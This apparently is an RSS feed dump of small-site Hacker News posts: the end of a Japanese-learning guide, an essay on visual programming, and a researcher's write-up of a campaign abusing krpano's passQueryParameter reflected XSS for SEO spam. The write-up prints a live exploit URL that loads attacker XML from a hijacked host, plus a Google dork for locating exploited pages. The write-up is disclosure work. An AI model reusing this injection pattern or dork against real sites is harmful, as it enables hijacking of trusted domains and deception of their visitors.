    WaniKani can be accessed via the web, but I use a third party iOS app called Tsurukame to access my lessons. Android users recommend an app called Smouldering Durtles these days. The first few levels are free which will take around a month to complete, and the service then costs $10 a month or $90 a year to access the rest. 


    BunPro

    Grammar is obviously a huge part of understanding any language, and learning Japanese while coming from English can feel wild because the structure of sentences frequently seems completely backwards. From what I’ve read, the biggest trap any prospective Japanese speaker can fall into is trying to assemble the language as a math problem when the best way to learn for long term success is to  first become aware of them, then almost passively watch the rules play out enough that they come subconsciously while you speak and read Japanese. 

    A frequently recommended resource for grammar is called Tae Kim’s Guide which is a free e-book available online, but reads very much like a textbook and requires a lot of undirected study to make your way through. BunPro on the other hand teaches similar concepts using the same SRS method as Benkyō and WaniKani, meaning each day can be spent opening your apps and learning new concepts across the spectrum of the language and reviewing old concepts as directed. 

    My experience with BunPro has been mixed so far in that while I love learning grammar and find it legitimately interesting, I don’t love the way BunPro teaches vocab. Unfortunately, both are necessary to progress through their prebuilt course and I find myself frequently understanding new grammatical rules immediately but get tripped up when the app instead quizzes me on vocab I’d glossed over. My two pieces of advice are as follows:

    1. Do not neglect the vocab side of BunPro as I did as it’s not a tenable way to interact with the service — once again I was led astray by internet strangers I shouldn’t have trusted.

    2. Go into the settings and tone down the daily new vocab words from 10 to 5. Between WaniKani, Duolingo, and some of the other study materials I’m using, adding 10 more vocab words to the mix via BunPro was the thing that would have burnt me out again.

    Anki

    Anki seems to be a religion to most people. On one hand a radiant beacon of light in the language learning journey and on the other a vengeful and hateful diety. Anki is an app built only for spaced repetition flash cards, though it doesn’t come with any cards at first. The app is free for Mac, PC, and web, but costs money on mobile as a one time fee that syncs across all of your devices. I’m going to be honest here: I don’t like it. The settings are a nightmare to maneuver, the process of finding usable decks is frustrating, and the way people talk about the app is like… off putting. There are modern day snake oil salespeople all over the place claiming their Anki deck will get you fluent in Japanese in six months or whatever — obviously untrue. So why is it here?

    The short version is that I can see the potential of how Anki will help me in the long term. For example there are Chrome extensions which will tie into your catalogue of Anki decks and highlight words you know along with words you don’t while watching shows on Netflix or videos on YouTube, allowing you to easily create new flashcards based on the content you’re actually watching. While I’m way too early on in the process to start doing this, I thought it would be helpful to get acclimated with how Anki works via a low-lift deck that I can check in with daily. For that I’ve landed on this free deck by JLab which incorporates elements of the previously mentioned Tae Kim Guide to Japanese Grammar while also incorporating vocab and listening + comprehension practice. As an aside, the video announcing this deck has the single most positive YouTube comment section I’ve ever seen — seems like a good sign!

    What’s Up Next?

    Aside from using the above resources every day, I’m trying out a few things here and there to see if they’re helpful and additive tools. One important element of this is finally returning to the Genki textbook after all these years, but also pairing it with some helpful YouTube playlists to make the lessons a bit easier to parse. This one by Game Gengo is wonderful for adding helpful context to the vocab taught in the book, and this one by TokiniAndy seems solid for grammar. It’s helpful to remember that no one tool will get you to fluency, and I’ve noticed that repeating similar concepts across multiple tools is helping reinforce them.

    While I’m on the topic of Game Gengo, he also has some great recommendations for games to play at all levels and will do in-depth guides for how to play each game in Japanese. Because of him, I picked up a Japanese copy of Dragon Quest XI for Switch so I can (very) slowly make my way through one of my favorite games of all time again — this time as a tool for learning.

    On the listening side, I’ve been spending a lot of idle time while commuting or cleaning the house listening to Nihongo Con Teppei for Beginners and YuYu Japanese, two podcasts with extremely basic Japanese speech and hundreds upon hundreds of episodes in the backlog. I’ve been listening to Teppei’s first few episodes repeatedly over the past two weeks and the realization that I’m starting to understand them in bits and pieces was one of the most shocking developments over the past 14 days. 

    A few more things to shout out here before I wrap up: 

    • Human Japanese - A textbook for your phone with helpful audio by native speakers and simple quizzes as you make your way through.

    • Shashingo - A game for learning Japanese by walking around a tiny Japanese neighborhood and taking photos of objects to create flashcards. I like it!

    • Speak Japanese Naturally - A Youtube channel where someone just vlogs her day and narrates it in Japanese while pointing out objects and having casual conversations with people in daily life. 

    • Jisho - An extremely good web-based Japanese dictionary.

    • Music - It’s music! I’ve been specifically been listening to a lot of city pop albums recently — a phase I get into pretty much every time I can tell winter is starting to recede and make way for spring. This time around, I’ve been spending a lot of time looking up lyrics and trying to better comprehend what’s being said instead of just letting the vocals wash over me.

    And that’s it! It’s a pretty exhaustive list, but that’s because learning a language is hard! I’m under no assumptions that I’ll know how to speak by the time my honeymoon rolls around, but I am hopeful that I’ll have solid habits and a working knowledge of the most basic words needed for low-touch interactions on a daily basis. 

    Good luck to you, too. I hope this helps cut through the noise a bit.

    頑張って。

    ]]>
    https://wavelengths.online/posts/how-im-learning-japanese-14-days-in hacker-news-small-sites-43198628 Thu, 27 Feb 2025 21:19:39 GMT
    <![CDATA[OpenCloud 1.0]]> thread link) | @doener
    February 27, 2025 | https://opencloud.eu/en/news/opencloud-now-available-new-open-source-alternative-microsoft-sharepoint | archive.org

    Unable to retrieve article]]>
    https://opencloud.eu/en/news/opencloud-now-available-new-open-source-alternative-microsoft-sharepoint hacker-news-small-sites-43198572 Thu, 27 Feb 2025 21:13:42 GMT
    <![CDATA[Visual programming is stuck on the form]]> thread link) | @iamwil
    February 27, 2025 | https://interjectedfuture.com/visual-programming-is-stuck-on-the-form/ | archive.org

    Underlying great creations that you love—be it music, art, or technology—its form (what it looks like) is driven by an underpinning internal logic (how it works). I noticed this pattern while watching a talk on cellular automaton and realized it's "form follows function" paraphrased from a slightly different angle. Inventing a form is a hard task, so you must approach it obliquely—by first illuminating the underlying function.

    This made me realize something crucial about visual programming: it’s stuck on form, rather than letting form follow function. Visual programming has long been trapped in the node-and-wires paradigm because its designers are overly fixated on form, neglecting the underlying function that should drive it. So as a whole, the field is stuck in a local minima. How can we break out of it and how can we find a function for the field that underpins the form?

    A clue from CellPond

    I was watching a talk and was struck not just by the presentation but also by a specific quote from Lu Wilson in a talk about CellPond–a visual programming language that expanded my expectations for cellular automata. And that's given that I'd already seen my share of the Game of Life by John Conway and read lots of A New Kind of Science by Stephen Wolfram.

    But even though Lu Wilson spent the last 10 minutes showing you the fantastic visuals, none of that was the point. The actual tasty result is that there is a virtual machine with only four operations underlying the CellPond system. And these four operations correspond with memory operations we're familiar with in CPUs: read, write, allocate, and deallocate. To me, that connection was utterly surprising. The grid of patterns (form) was informed and driven by the underlying virtual machine (function).

    "I think if you were to learn from CellPond, you'd take away not just the UI—but you can take the UI too if you want. I was very surprised by this because, in all my reading of past solutions to these problems, they were all about the high-level user interface; they were about the UI. I thought I'd have to build layers upon layers of UI, but really, as soon as the low-level stuff was sorted out, the UI just figured itself out."
    - Lu Wilson (🐤 · 🦋)

    I wondered: how did Lu Wilson come up with the underlying function? It seemed magical. This puzzling revelation made me realize it wasn’t just about the UI—there was a deeper principle at play.

    Form follows function

    In the subsequent months, I kept turning it over in my head. The key lay with the opening quote.

    When you figure out the low-level stuff, the UI all falls into place.

    It wasn't until a drive while I was listening to Paul Graham's A Taste for Makers that I made the connection. The CellPond talk was a demonstration of the oft-repeated adage of "form follows function." Here's the relevant excerpt:

    In art, the highest place has traditionally been given to paintings of people. There is something to this tradition, and not just because pictures of faces get to press buttons in our brains that other pictures don't. We are so good at looking at faces that we force anyone who draws them to work hard to satisfy us. If you draw a tree and you change the angle of a branch five degrees, no one will know. When you change the angle of someone's eye five degrees, people notice.

    When Bauhaus designers adopted Sullivan's "form follows function," what they meant was, form should follow function. And if function is hard enough, form is forced to follow it, because there is no effort to spare for error. Wild animals are beautiful because they have hard lives."
    - Paul Graham A Taste for Makers

    Honestly, I had never thought much about "form follows function." It seems obvious enough when you hear it for the first time. Sure, given an interface, why else would it express anything other than its purpose? It would seem counterproductive otherwise.

    It wasn't until I was forced to invent a form did I really understood what it meant. The adage "form follows function" is for those tasked to invent the form, not for when you're given it. In my own words, it's this:

    If a design is any good, how something looks, feels, and works is a naked expression of its function, its algebra, its rationality–its underlying nature. To design a form, you should not just come up with it out of thin air. You have to attack the problem obliquely and work out its function first. Once the function–the underlying nature, internal consistency, and algebra–is worked out, the form will fall out as a consequence of it.

    Three faces of function

    What I mean by "underlying nature" isn't that it exists independently of human creation; rather, every design is embedded in an environment that shapes its intrinsic properties. The function of anything useful is always in the context of its environment. When we understand the context of a well-designed thing, we understand why it looks the way it does. An animal form reflects its adaptation to the ecological niche in its environment.

    By "rationality", I mean some kind of internal consistency. The function of something well-designed will have a certain repeated symmetry. Given a choice of design, it'll consistently use the same thing in as many scenarios as possible. Good game design enables a single item to serve multiple functions. The gravity gun in Half-Life 2 enables players to pick up and launch objects. It's used for turning environmental items into weapons, solving physics-based puzzles, and for navigating hard-to-reach areas. In Minecraft, the water bucket can extinguish fires, create waterfalls for safe descent, irrigate farmland, and serve as a barrier against certain enemies.

    By "algebra", I mean a set of rules about how a design's components compose. Most games have a physics engine that computes how objects in a game interact with each other in space. It's a "movement calculator." Legend of Zelda: Breath of the Wild additionally has a chemistry engine that it uses to compute how different materials interact with each other. It's a "state calculator."

    In summary, function represents the intangible structure governing the relationships, interactions, and contextual fit of a design’s underlying components. A form can't exist outside of its function, and its function is shaped by its environment. We can observe and interact with the form directly, but not its function. We can exist in the environment, but the function is invisible to us without a lot of work to infer it.

    A form not informed by function feels disjointed, inconsistent, and frustrating. Without an underlying function to underpin the form, the shape of form is simply at the inconsistent whims of the designer. Functions keep designers honest about the purpose of form: in service of function. Of course you can explore and play with form independent of function, but that's the jurisdiction of art, not design.

    To invent a form, start with the function

    "Form follows function" is advice for people making something, especially those whose work has a very visible interface facing the end user. To invent a form, start with the function. But it's easy to make errors of two kinds, even if you already know this in your head.

    The first kind of error is to pursue form without considering function. Instead, you must ignore the form, at least initially, and focus on figuring out the function first. This is largely due to the intangible nature of function. It's an easy mistake to focus on form, even far into your creative career.

    This mistake is understandable. Whenever people interact with anything, their initial contact is the interface—the bridge between user and design. For anyone new to something, it's natural to start by engaging with that interface, because it's what they're most familiar with. So when they turn around to make something in that domain, they start with the interface, the form. You can see this readily: new creatives in a field start by copying the masters before finding their own voice.

    It's also understandable because function is largely more abstract and more intangible than form. It's harder to get a grip on something amorphous, and you may have to start off with something concrete. It can be part of the process to draw up concrete examples first. In fact, when confronted with an unfamiliar domain, this can be quite productive in getting a handle on it. But it can be easy to forget and take a step back and ask: "what is the common underlying logic or abstraction to all these examples?" When you are able to take a step back, you're using the concrete examples as a stepping stone to figuring out the underlying function.

    The error of the second kind is pursuing function without considering the user. As a warning for those that lean too far on the other side of the precipice, this doesn't mean you can ignore the end user when figuring out the function. If we could represent the utility of the underlying function as a vector, it would still need to point in the direction of the user. The underlying function must support and give context to the visible form built on top. Both are built so the direction and magnitude of their utility vector can support the user in the direction of their goals.

    Too many back-end engineers misinterpret 'form follows function' as a license to design arbitrary database tables and APIs, assuming that the front end will compensate. That's how we get terrible interfaces where the end user needs to be aware of the data model to use it effectively, like Git.

    When it comes to visual programming, I think it's stuck in the error of the first kind, with its focus on form.

    Visual programming is not just node-and-wires

    Node-and-wire diagrams have become a lazy default. Most visual language designers never ask whether those boxes and arrows genuinely help programmers. It’s a classic case of letting form precede function.

    When one looks through the Visual Programming Codex, it's obvious an overwhelming majority are based on the node-and-wires model. Not just that, but there are mostly only two variations:

    1. The nodes represent data, and the wires represent functions
    2. The nodes represent functions, and the wires represent data shunted between functions.

    Did many of them settle on it because it's the best visual representation to help aid the process of programming? Or did they use it because they're mimicking an existing form?

    I think node-and-wires is popular because visual programming designers make the fundamental assumption that the underlying nature and logic of programming is just traditional textual programming. If that's your assumption, then you'd naturally think all you have to do is find visual representations for existing textual language constructs. Hence node-and-wires is the form you get when you take pure functions as the underlying logic underpinning the form.

    On first glance, node-and-wires seem like a good fit. The wires going into a node are like the input parameters of a pure function, and the wires going out are like the output value. But what about differentiating between the definition of a function versus calling it? Often in node-and-wires visual languages, there's no separation. The definition is the application. What about passing around functions or thunks? Much of the power in pure functional programming lies in the power of higher-order functions, and I haven't seen very good node-and-wires representation of that. After decades of trying, most pure functional programming is still largely expressed in text. To me, that's damning evidence against the practice of using nodes-and-wires to model functions. Text is still the better form for expressing the underlying logic of functional programming.

    Imperative programming with node-and-wires fares no better. A loop in LabVIEW gives no more advantage or clarity over writing it in text. Seeing the totality of a sequence of steps in parallel in a circuit-like diagram doesn't solve the fundamental problem with imperative programs; it doesn't help the developer understand combinatorial state explosions or state changes over time.

    I think where node-and-wires have provided the biggest advantage is in specific domains in which a) there's massive value to examine intermediate data and values between transformations and b) there's a well-known visual representation of that intermediate data and value. This has been demonstrated in visual languages like Unreal Engine's Blueprint for game programming shaders and Max/MSP for sound synthesis in music. But these have been limited to these narrow domains. Visual programming has not found a foothold in general purpose programming domains.

    Modeling problems

    What then, if not node-and-wires? The aim here is to uncover an alternative underlying logic—one that can more effectively drive the form in visual programming. How would you go about finding another underlying function in "form follows function" if not the current programming paradigms we know? I think this is the wrong question. Although correct in direction and spirit, I think a better question is: how should we model problems that can leverage the computational power of our visual cortex?

    We write programs primarily to model and solve real-world problems. We go through the exercise of encoding the problem model in programming languages, because we can automate the generation of solutions. And the reason why we keep banging on the visual programming door is because we understand intuitively that our visual cortex is an under-leveraged power tool.

    The human visual cortex is a powerful pattern recognition apparatus. It can quickly compare lengths, distinguish foreground from background, recognize spatial patterns, and other amazing feats of perception, all at a glance. We leverage it in data visualizations to make sense of large quantities of data, but we haven't been able to leverage it to make sense of computational systems.

    ❓"Imagine what a visual programming language would look like if it was able to leverage the power of the human visual cortex" For the record, I don't think this is it.

    If we had a visual programming language that could leverage the human visual cortex, then at any zoom-level of abstraction, at a glance we could understand the overall structure of the program as it relates to the domain at that level of abstraction. And if we were looking at a running program, then we could get an idea of the overall state and process. Yes, we have bespoke visualizations of running programs in the form of metrics and dashboards. But we don't have a universal visual language to represent the structure or state of a program that applies to different programs.

    What about text? Aren't textual glyphs a kind of visual language? Not in the way I mean. For text to be considered a visual programming language, it'd have to leverage the human visual cortex at different zoom-levels of the program. Certainly, with syntax highlighting we leverage the visual cortex and use color to distinguish between different syntactical elements. This counts. But we only get this at the level of a function. It doesn't apply when we zoom out to the overall structure of the code base. And there's certainly no zoom-out level in which we get visual understanding at the level of the problem domain.

    The closest thing I can think of that might fit the bill is APL and its ilk. By condensing operators into single characters, sequences form idioms. Just as we recognize whole words rather than individual letters, idioms allow us to comprehend entire operations without parsing each symbol. So as you zoom out of the code, you can see the meaning of the code by identifying common idioms. Strangely, it seems many APL environments don't feature syntax highlighting.

    So if visual programming is to be useful, I think the angle of attack is to find a way to model problems, and this might not be the same way that we model problems in textual languages–even if the underpinning implementation is all lambdas and Turing machines. So how do we model problems?

    Entities and relationships

    I'll say up front, I don't know what modeling problems should look like. Nonetheless, it seems there are two main aspects for any system we're interested in:

    1. visually representing the entities in a problem domain
    2. visually representing the entity relationships.[2]

    Regardless of the paradigm, imperative, object-oriented, functional, or logical, there are both "entities" (structs, objects, compound values, terms) and "how they relate" (imperative processes, messages, functions, rules and predicates). If I had to take a stab at it, I'd start here.

    Of the two, representing the different entities in a problem domain seems more amenable to visual programming because they're nouns. Most of the things we see around us are nouns. Hence, we can imagine that inert data representing entities would have a canonical visual representation. But even then, entities often have far more attributes than we might want to visualize at a time to understand its purpose and behavior. How do we choose what attribute is important to show? And what should be the visual form for the attribute in these entities?

    The two questions are related, but to drive the point home, I'll focus on the second one. If we have some struct with two attributes in some generic language, how would we visually represent them?

    struct Foo {
      bar: float,
      baz: float
    }

    We might think a universally useful representation of a collection of these instances is two histograms: one for bar and one for baz. For any given instance, its corresponding value could be highlighted on the histogram.

    Is this useful? Answer depends on our task at hand. There's no one-size-fits-all visualization of entities. What if I told you bar is an x-coordinate and baz is the y-coordinate? Now, perhaps a visualization that's more fitting is a scatterplot where each instance is represented as an x. We put the relationship between bar and baz in a spatial relationship to see if our visual cortex could recognize a pattern.

    In the histogram visualization, I wouldn't be able to use my visual cortex to discern the relationships between bar and baz traces out a flower. However, in the spatial canvas visualization, I could easily see the flower trace because by pitting bar and baz in a spatial relationship, I'm creating a mapping that makes an affordance for my visual cortex.

    This only worked because there was a spatial relationship between bar and baz, especially if I know they represent x and y coordinates. We couldn't just look at the data and easily discern what visualization to use. The label and the intention of the user also give meaning to what visualization is best suited for an entity. Hence, I think there's no one-size-fits-all visualization for entities. There's no single mapping of attributes to visualizations that makes sense, unless the user's intention and goals remain fixed.

    Besides entities, every program encodes relationships between its entities. How do we visually represent their relationships in a way that's illuminating at a glance without devolving into an illegible spaghetti mess? Relationships can be harder to model, because they're typically invisible to us, as they're often inferred.

    Like the example with representing entities visually, representing relationships visually is likely to depend on both the goals of the user as well as the meaning of the entities at hand. I suspect a good visual representation of the relationship between two tables in a query is going to be different than a good visual representation of the relationship between two pieces of middleware in a web stack. However, I do think we can do better than a line.

    The go-to representation of a relationship is often the line or an arrow, where it connects two things on the canvas together. The trouble with lines is that they doesn't scale with the visual cortex. After a couple dozen lines, we lose track of any sense of the overall relationships between entities. But I don't think this can be the only way. The visual cortex also relates visual elements if they have the same color or if they're spatially clustered together. As the previous example on a plot of bar and baz showed, relationships could be spatial, by which we can plot them spatially to reveal relationships, without directly drawing lines and arrows everywhere.

    As before, it's hard to draw any generally productive conclusions on how to best visually represent relationships between entities without knowing the goal of the user as well as the meaning behind the entity and relationships we're trying to represent. The only point I'm trying to drive home is that we have more tools at our disposal besides lines and arrows, because the visual cortex is perceptive and discerning about colors, groupings, and motion. We typically use these visual elements haphazardly, if at all, rather than as a deliberate attempt to leverage it for understanding. And that's just in graphic design and data visualization. It's completely overlooked in program structure, debugging, and domain problem modeling.

    At this point, those that hear entities and relationships might be drawn to ask, isn't this just object-oriented programming? It is true that object-oriented thinking trains you to identify entities in the problem domain and model their relationships through method calls and messaging. However, object-oriented programs suffer from private state whose effects are observable from the outside littered everywhere, making it hard to reason about program behavior. What I'm saying is orthogonal to and doesn't invalidate what we've learned about structuring programs in the past 3 decades. To sum up, I'm saying the unit of representation for visually representing programs may not be the function and its input and output parameters, as node-and-wire visual programmers are likely to do. It might be something else, which can leverage the power of the visual cortex.

    Computation is figuring out the next state

    Modeling problems as entities and their relationships is only half the equation. By only modeling entities and their relationships, we've only described a static world. We can do that already without computers; it's commonly done on whiteboards in tech companies around the world. Every time we go up to the whiteboard with a coworker to talk through a problem, we're trying to leverage the power of our visual cortex to help us reason through it. But unlike our textual programs, whiteboards aren't computational.

    If whiteboards were computational, they might show how the state of the problem changes over time, or how it changes in response to different external inputs or effects. Thus, the question is, how do we visually represent how the system state should evolve over time or in response to external inputs? [1]

    Cellular automaton systems typically express computation through rulesets. Rulesets are typically expressed as a pure functional transformation between the current state and the next state. Taking rule 110 in 1D cellular automaton as an example, the state of the next cell depends on the three cells above it. Given the three cell pattern above, this is what the cell in the next line should be. You can see this like a β-reduction, substituting symbols with other symbols until we can substitute no further, with the resulting value as our answer.

    The famous rule 110 in 1D cellular automaton. This rule is Turing Complete!

    As the CellPond talk at the top of the page points out, rulesets for more complicated behaviors, like trains on tracks have a combinatorial explosion of rules. One of CellPond's innovations was to have rulesets that represent (or generates?) groups of rulesets, so that visually expressing the rulesets remains tractable for humans.

    But pure functions are just mappings. Any pure function can be replaced by an equivalent infinite table of key-value pairs. Rulesets are just explicit mappings of inputs to outputs. Hence, if rulesets are to be tractable, we must be able to express not just how a single current state maps to the next state, but how entire groups of states map to a next state.

    We have familiar mechanisms in textual programming to express a selection of groups of input states in a succinct way. We have boolean logic in if expressions. We have maps and filters. We have select and where clauses in SQL queries. But we have no universal and composable ways of expressing this selection of previous states and mapping them to next states. Additionally, we don't have universally recognized ways of expressing this mapping from groups of inputs to outputs for state types other than a grid of cells.

    A different way forward

    Certainly, it could be possible that multi-dimensional aspects of a codebase would be quite hard to represent in its entirety visually. But I don't think it's a stretch to say that we lean pretty hard on the symbolic reasoning parts of our brain for programming and the visual reasoning parts of our brain are underleveraged.

    Visual programming hasn't been very successful because it doesn't help developers with any of the actual problems they have when building complex systems. I think this is a result of ignoring the adage "form follows function" and trying to grow a form out of traditional programming paradigms that fail to provide good affordances–the utility vector is pointing the wrong way–for those actual problems in complex systems. To make headway, I think we should focus on discovering underlying logic and function of how to model problems visually on a canvas–not just the entities, but also their relationships. In addition to modeling problems, we also have to discover how to model transformations and transitions of state, so our models are also computational.

    We have the hardware: our visual cortex is a powerhouse for pattern recognition and spatial reasoning. We just don’t have the right computational grammar to feed it. If we want a visual programming breakthrough, we have to leave the legacy of text-based paradigms behind and unearth a new kind of function—one that only makes sense visually. Once we do, the right ‘form’ will follow so obviously, we’ll wonder why we waited so long.


    [1] One way is with visual rule sets. This almost feels like declarative or logic programming. But as the Cell Pond talk at the top of the essay pointed out, unless you have a representation of rule sets that can be expanded, you suffer combinatorial explosion.

    [2] Depending on who you are, this can sound either like object-oriented programming or category theory.

    ]]>
    https://interjectedfuture.com/visual-programming-is-stuck-on-the-form/ hacker-news-small-sites-43198547 Thu, 27 Feb 2025 21:11:04 GMT
    <![CDATA[Mass Website Exploitation via Virtual Tour Framework for SEO Poisoning]]> thread link) | @StriverGuy
    February 27, 2025 | https://olegzay.com/360xss/ | archive.org

    How I Accidentally Uncover One of the Most Exploited XSS Vulnerabilities Online

    My story begins in a way that many readers of technical blogs might find familiar—just another uneventful evening alone at the computer. For purely educational purposes, I opened a Chrome incognito window, went to Google, and typed the word “porn.” Thanks to my ongoing research in this area, I’m quite familiar with the usual search results. But this time, something unusual caught my eye—a new website appearing in the third row, listed under Yale University’s domain with the title: “++[S*X@Porn-xnxx-Videos!…] Tamil sexy student.” It piqued my curiosity, but not for the reasons you might think.

    Did Yale University Enter the Porn Industry?

    I was almost certain the website had been hacked, but I still wasn’t sure how. My first thought was a subdomain takeover—a common attack where an abandoned CNAME record pointing to an unused asset gets hijacked by an attacker to host malicious content under the original domain. I had previously explored this technique in my research at Guardio, where I coined the term “Subdomailing”.

    To test my theory, I clicked the link to see where it would take me. The page initially loaded what looked like a legitimate platform but quickly redirected me to a random porn ad.

    https://virtualtour.quantuminstitute.yale.edu/?id=yuxs&xml=https://staging-prep-cms.scouts.org.uk/lnk/video/?video=video-xx-indain-girl-xxx-xxxxxxx-xvid-60159.html

    Examining the original URL, a few things stood out: the subdomain name hinted that the site was related to a virtual tour, and an xml parameter contained a suspicious-looking URL—something that definitely needed a deeper look.

    Curious, I tried opening the same URL again but without the parameters—and suddenly, I found myself inside Yale’s Quantum Mechanics Institute. Took a quick tour, impressive place. If you're into quantum computing, worth a look. But honestly, I never really got superposition—how can a bit be both 0 and 1? Seriously, how does that work?? 😂

    …Anyway, back to the point.

    Reversing the Payload

    The xml parameter was clearly the key factor, so I considered the possibility of an open redirect. I modified the parameter value to https://www.example.com, expecting a redirection—but instead, the page threw an error:

    At that point, I knew this was more than just a simple redirect. I hadn’t even checked the original xml parameter yet—and when I did, one thing stood out: the URL belonged to the official UK Scouts website, which seemed suspicious. A quick DNS check confirmed my suspicion—the subdomain had been hijacked through an abandoned Azure account, just as I had explained earlier.

    Then, I examined the response contents of the URL to see what was inside:

    The response was an XML document with an onloaded event containing an eval function executing a Base64-encoded payload—one of the most classic indicators of a malicious XSS (Cross-Site Scripting) payload.

    At that moment, I felt a rush of excitement—this was the first time I had found an actively exploited XSS in the wild. Don’t get me wrong—I strongly oppose malicious activities like this, but the researcher in me couldn’t help but celebrate 😂.

    Beyond the XSS, the main tag <krpano> revealed the underlying technology powering my virtual tour through the quantum institute.

    💡

    Krpano is a popular framework used to host 360° images and videos, enabling the creation of interactive virtual tours and VR experiences. It supports various formats, including gigapixel images and fisheye projections, and allows customization through XML and JavaScript.

    That meant the XSS was either in the framework itself or in the website’s implementation.

    Curious to understand what the payload actually did, I decoded it:

    Nothing particularly sophisticated stood out in the script—except that it fetched a target URL from yet another stolen asset, this time volvo.com, and used the id parameter to identify the ad campaign.

    At this point, I hadn’t even fully started my investigation, and I had already found three abused assets from three major organizations. That’s when I realized—this wasn’t just some random hacker selling services on Telegram. I was dealing with a serious actor—someone with a massive bank of stolen assets and a well-organized operation.

    Zero Day or One Day? 

    Reversing this XSS was a fun ride. At first, I assumed the external XML loading was an intended feature of the Krpano library and that the vulnerability lay in how the XML was parsed. So, I dived into debugging the obfuscated library, searching for the source of truth. After 30 minutes of digging, I finally did what I should’ve done from the beginning—checked the documentation. And there it was:

    The XML onloaded attribute? A documented feature.
    The external xml parameter? A design choice - one that should be disabled in production.

    I came across a crucial configuration setting - passQueryParameter.

    This setting controls whether query parameters from the hosting website are directly passed into Krpano’s configuration. The problem? For years it was enabled by Krpano's default installation. Meaning, any attacker could inject arbitrary XML, leading to reflected XSS if a vulnerable website didn’t explicitly disable it.

    Digging deeper, I found CVE-2020-24901. The description matched exactly what I observed: reflected XSS caused by the passQueryParameter setting. While the original POC used different parameters, the xml parameter was also mentioned. So, was this a one-day? Yes. But somehow, it slipped past too many websites, as you're about to see.

    The Shoemaker's Children Go Barefoot

    In this Krpano forum thread, a user raised concerns about this CVE—a full year after its disclosure. Krpano’s developers downplayed the issue, claiming it was a case of misuse rather than a security flaw. However, they did mention that as of version 1.20.10, they restricted passQueryParameter to an allowlist in an attempt to prevent XSS.

    But here’s the problem.

    Explicitly adding the xml parameter to the allowlist still left the same XSS risk open, and this configuration remained available for use.

    And now, for the best part.

    While browsing Krpano's documentation, I noticed they hosted live examples of their 360° tour framework on their own website. Naturally, I checked their implementation… and guess what? They were vulnerable too.

    Once I cracked the technical side of the vulnerability, I shifted gears—I wanted to understand the bigger picture. How widespread was this campaign? How many other sites had been exploited? That’s when an idea hit me. Instead of chasing leads blindly, why not use my good old friend, Google Dorking?

    inurl:xml=https AND inurl:id=

    And just like that, I opened the Pandora box.

    The sheer scale of this campaign caught me off guard. With a couple of Google searches, I uncovered thousands of ads spread across 350+ exploited websites—and not just any websites.

    Government portals. Entire state websites. Top universities in America. Major hotel chains. News outlets. Car dealerships. Fortune 500 companies. All hijacked and repurposed as SEO tools to spread spam, ads, and shady promotions.

    Most of these sites were very popular and are having millions of visitors each month, and some had been hit multiple times, serving different types of ads.

    And it wasn’t just porn ads anymore. I found diet supplements, online casinos, fake news sites—every kind of sketchy ad we instinctively close without a second thought. But the real surprise? Some of these hijacked pages weren’t even pushing ads—they were being used to boost YouTube views.

    This wasn’t just a spam operation. It was an industrial-scale abuse of trusted domains.

    I also analyzed the xml parameter value. Some were the usual suspects: cheap, throwaway domains registered with privacy-shielded WHOIS info, making it impossible to trace the owners. But others? Hijacked subdomains of major websites.

    XSS for SEO Poisoning 

    Everything about this campaign screamed SEO pros. One of the biggest proofs was right at the beginning of this blog—where I showed how they pushed their ad to the third row in Google search results for one of the most searched terms in the world: "porn". Sure, leveraging Yale University’s domain played a big role in boosting credibility, but pulling off that level of ranking manipulation is still no small feat. 

    In addition to that, the concept itself of a reflected XSS that is used to be promoted in SEO results… Is nothing I’ve seen before, not at this scale. A reflected XSS is a fun vulnerability but on it’s own requires user interaction, and one of the biggest challenges is to make people click your reflected XSS link. So using search engines as a distribution platform for your XSS is a very creative and cool way to do it.

    These guys squeeze every last drop out of every website they compromise. Take Utah’s official website, for example—at the time of my search, it had over 100 indexed spam results

    And keep in mind, my data was limited to Google Dorks, meaning they had likely indexed the same page with different ads hundreds of times beyond what I could see.

    They weren’t just injecting links—they were optimizing them:

    • Controlled the title, description, and preview image.
    • Used random strings in titles to make each result unique.
    • Added fake review counts and star ratings.

    I can’t accurately estimate how many clicks this campaign generated, but judging by its scale, millions wouldn’t be a stretch. 

    But there was still one question that kept bugging me… 

    For some reason, I always assumed that the best way to exploit an XSS was to directly attack the vulnerable website and its user base—stealing cookies, session tokens, or performing actions on behalf of users. However, in this case, all I found was JavaScript executing simple redirects and nothing more 🤔.

    Thinking logically, I came up with two possible reasons why they chose this approach:

    1. They're likely a shady ad firm, more interested in blasting ads everywhere than launching direct cyberattacks. This is probably their most effective monetization strategy.
    2. They’re operating in a legal gray area—while their methods are unethical, they aren't outright criminal. If they stole user data or launched full-fledged attacks, it would escalate the operation into something that attracts law enforcement and investigations. However all they did was to distribute ads.

    But then, while digging through the scraped websites, I stumbled upon something bigger—a website with over half a billion monthly visitors that was treated specially.

    CNN - More Than a Redirect

    This wasn’t just another case of a high-traffic website being compromised. What made it stand out? Clicking the malicious link didn’t redirect me elsewhere—it kept me right on cnn.com, landing on what appeared to be a legitimate CNN article. Same domain, same structure—except the content was in Turkish and the title was “Top Reliable Casinos Online.”

    Who wouldn’t trust an article hosted on CNN, especially when hunting for the most “reliable” online casino?

    This was a smoking gun—proof the attackers knew exactly what they had in their hands. Instead of a cheap redirect, which would be a waste, they embedded their casino promotion directly inside CNN’s domain, disguising it as a real article. They weren’t just hijacking traffic; they were weaponizing trust.

    Digging deeper, the xml payload was hosted on this “unsuspicious” domain "jqeury.store". The homepage on that domain served a list of links to multiple instances of the same CNN exploit, each serving different variations of the casino article.

    But it didn’t stop there. Some links also pointed to "geo.tv"–Pakistan’s largest news site. Opening them revealed the same trick—fake articles injected into a vulnerable endpoint, all promoting the same casino.

    Responsible Disclosure

    The people behind this campaign remain a mystery, but from what I’ve seen, many clues suggest it was run by an Arab group—based on the ads, patterns, and random breadcrumbs I found during my investigation. Either way, I couldn’t care less; that’s a problem for law enforcement. What I can do, however, is try to minimize the damage by reaching out to the biggest brands affected.

    I set out to report as many exploited instances as possible. What I didn’t anticipate was just how difficult that would be. I personally uncovered over 300 exploited domains, yet most had no vulnerability disclosure program. Hours went into tracking down contact emails and submission forms, but most of my reports went nowhere—buried in unread inboxes or bounced back with no response.

    Still, there were wins. Some reports made it through, earning me acknowledgements from major organizations like U.S. Department of Health & Human Services and CERT-EU. A handful of vulnerable assets even got fixed—some thanks to my disclosures, others by sheer coincidence.

    That’s when I decided to start my own blog—to shed light on overlooked attack vectors and reach a wider audience. If there’s one thing this experience reinforced, it’s that these problems extend far beyond a handful of exploited domains—and they don’t get fixed until someone makes enough noise.

    Krpano’s Response

